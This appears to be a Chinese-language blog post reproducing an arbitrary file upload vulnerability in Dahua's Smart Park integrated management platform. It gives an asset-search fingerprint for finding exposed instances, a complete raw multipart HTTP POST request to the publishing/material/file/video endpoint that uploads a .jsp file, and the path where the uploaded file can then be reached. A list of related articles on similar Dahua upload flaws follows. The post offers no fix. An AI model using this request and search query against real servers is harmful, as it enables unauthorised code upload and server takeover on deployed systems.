Advertisement

大华智慧园区综合管理平台publishing任意文件上传漏洞

阅读量:

大华智慧园区综合管理平台存在文件上传漏洞,攻击者可通过POST /publishing/publishing/material/file/video接口任意上传文件,导致系统被攻击与控制。漏洞位于平台地址/publishing/publishing/material/file/video和/publishingImg/VIDEO/230812162057144051.jsp,可利用Java/1.8.0_381浏览器请求复现。

一、漏洞简介

大华智慧园区综合管理平台整合了智能化、信息化、网络化、安全化等多元功能,致力于为园区提供全方位的综合管理服务,涵盖安防、能源管理、环境监测、人员管理、停车管理等多个领域。该平台存在文件上传漏洞,攻击者可通过该平台的publishing/publishing/material/file/video接口任意上传文件,导致系统被攻击并被恶意控制。

二、影响版本

  • 大华智慧园区综合管理平台

三、资产测绘

  • hunterapp.name="Dahua 大华 智慧园区管理平台"
  • 登录页面
在这里插入图片描述

四、漏洞复现

复制代码 
    POST /publishing/publishing/material/file/video HTTP/1.1
    Content-Type: multipart/form-data; boundary=00content0boundary00
    User-Agent: Java/1.8.0_381
    Host: xx.xx.xx.xx
    Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
    Connection: close
    Content-Length: 287
    
    --00content0boundary00
    Content-Disposition: form-data; name="Filedata"; filename="1ndex.jsp"
    
    test
    --00content0boundary00
    Content-Disposition: form-data; name="file"
    
    file
    --00content0boundary00
    Content-Disposition: form-data; name="Submit"
    
    submit
    --00content0boundary00--
在这里插入图片描述

上传文件位置:

复制代码 
    http://xx.xx.xx.xx/publishingImg/VIDEO/230812162057144051.jsp
在这里插入图片描述

全部评论 (0)

还没有任何评论哟~

相关文章推荐

大华智慧园区综合管理平台publishing任意文件上传漏洞

一、漏洞简介 大华智慧园区综合管理平台是一个集智能化、信息化、网络化、安全化为一体的智慧园区管理平台,旨在为园区提供一站式解决方案,包括安防、能源管理、环境监测、人员管理、停车管理等多个方面。

大华智慧园区综合管理平台任意文件上传漏洞

一、漏洞简介 华智慧园区综合管理平台是一个集智能化、信息化、网络化、安全化为一体的智慧园区管理平台,旨在为园区提供一站式解决方案,包括安防、能源管理、环境监测、人员管理、停车管理等多个方面。

大华智慧园区综合管理平台poi任意文件上传漏洞

一、漏洞简介 大华智慧园区综合管理平台是一个集智能化、信息化、网络化、安全化为一体的智慧园区管理平台,旨在为园区提供一站式解决方案,包括安防、能源管理、环境监测、人员管理、停车管理等多个方面。

大华智慧园区综合管理平台 video 任意文件上传漏洞

目录 漏洞描述 FOFA语法/鹰图语句 漏洞复现 漏洞描述 大华智慧园区综合管理平台video接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件到服务器中,控制服务器权限 FOFA语法/鹰图语句...

大华智慧园区综合管理平台存在任意文件上传漏洞

大华智慧园区综合管理平台存在任意文件上传漏洞 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一...

【漏洞复现】大华智慧园区综合管理平台前台任意文件上传漏洞

文章目录 前言 声明 一、简介 二、影响范围 三、资产搜索 四、漏洞测试 四、修复建议 前言 大华智慧园区综合管理平台存在前台任意文件上传漏洞,攻击者可通过特定Payload获取服务器敏感信息,进而获...

【1day】复现大华智慧园区综合管理平台任意文件上传漏洞

注:该文章来自作者日常学习笔记,请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与作者无关。 目录 一、漏洞描述 二、影响版本 三、资产测绘 四、漏洞复现 一、漏洞描述 大华智慧园区综合...

【漏洞复现】大华-智慧园区综合管理平台-devicePoint_addImgIco-任意文件上传

目录 免责声明 0x01产品简介 0x02漏洞概述 0x03网络测绘 0x04漏洞复现 0x05Nuclei 免责声明 此内容仅供技术交流与学习,请勿用于未经授权的场景。请遵循相关法律与道德规范。任何...

大华智慧园区综合管理平台 bitmap 任意文件上传漏洞复现

0x01产品简介 “大华智慧园区综合管理平台”是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。

大华智慧园区综合管理平台 poi 任意文件上传漏洞复现

0x01产品简介 “大华智慧园区综合管理平台”是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。